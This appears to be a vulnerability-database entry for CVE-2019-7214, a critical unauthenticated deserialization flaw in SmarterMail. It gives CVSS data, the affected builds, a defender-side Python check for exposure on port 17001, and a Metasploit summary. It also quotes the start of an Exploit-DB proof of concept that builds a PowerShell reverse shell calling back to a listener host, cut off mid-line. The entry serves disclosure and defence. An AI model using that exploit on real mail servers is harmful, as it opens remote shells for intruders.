CVE-2019-7214
Published: 2019-04-24
Priority: P1 · 83 · critical · 9.8 · CVSS 3.0
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 83.32% (99.6th percentile)
SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| smartertools | smartermail | >= 16.0.6345 < 16.3.6985 | 16.3.6985 |
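
A defender-side triage check built from the two facts stated above (the affected version range and the port 17001 listener), given here as an added example that is not part of the original page or any vendor tooling. The function names, triage labels and sample `netstat -ano` lines are constructed for illustration, and the input is assumed to be Windows `netstat -ano` output.

```python
import ipaddress

# Range and port come from the advisory text and "Affected" table above.
AFFECTED_MIN = (16, 0, 6345)  # inclusive lower bound
FIXED_IN = (16, 3, 6985)      # first fixed build, exclusive upper bound
REMOTING_PORT = 17001

# Constructed sample of Windows `netstat -ano` output (not from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:17001          0.0.0.0:0              LISTENING       4321
  TCP    127.0.0.1:9998         0.0.0.0:0              LISTENING       4321
  TCP    [::]:17001             [::]:0                 LISTENING       4321
  TCP    10.0.0.5:17001         10.0.0.9:50122         ESTABLISHED     4321
"""

def is_affected(version):
    """True if a dotted version such as '16.3.6970' is in the affected range."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return AFFECTED_MIN <= parts < FIXED_IN

def remote_listeners(netstat_text, port=REMOTING_PORT):
    """Local addresses LISTENING on `port` that are not bound to loopback."""
    found = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] != "TCP" or cols[3] != "LISTENING":
            continue
        host, _, lport = cols[1].rpartition(":")
        if lport != str(port):
            continue
        # Strip IPv6 brackets and any zone id before parsing the address.
        addr = ipaddress.ip_address(host.strip("[]").split("%")[0])
        if not addr.is_loopback:
            found.append(cols[1])
    return found

def assess(version, netstat_text):
    """Combine both checks into one triage label (labels are hypothetical)."""
    affected, exposed = is_affected(version), remote_listeners(netstat_text)
    if affected and exposed:
        return "patch-now-and-firewall"
    if affected:
        return "patch"
    if exposed:
        return "firewall"
    return "ok"

if __name__ == "__main__":
    print(assess("16.3.6970", SAMPLE_NETSTAT), remote_listeners(SAMPLE_NETSTAT))
```

A fixed build that still shows a non-loopback listener on 17001 is reported as `firewall`, since the page states the port is only closed to remote access by default after the patch.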
CVSS provenance
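| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |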
No detection rules found.
Exploit-DB
SmarterMail Build 6985 - Remote Code Execution
exploitdb·2020-12-09·CVSS 9.8
---
```python
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Homepage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
import base64
import socket
import sys
from struct import pack
HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444
psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..655
```
Metasploit
SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
metasploit·CVSS 9.8
This module exploits a vulnerability in the SmarterTools SmarterMail software for version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds expose three .NET remoting endpoints on port 17001, namely /Servers, /Mail and /Spool. For example, a typical installation of SmarterMail Build 6970 will have the /Servers endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where serialized .NET commands can be sent through a TCP socket connection. The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability to perform .NET deserializa
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/160416/SmarterMail-6985-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/173388/SmarterTools-SmarterMail-Remote-Code-Execution.html
- https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
- https://www.smartertools.com/smartermail/release-notes/current
Published: 2019-04-24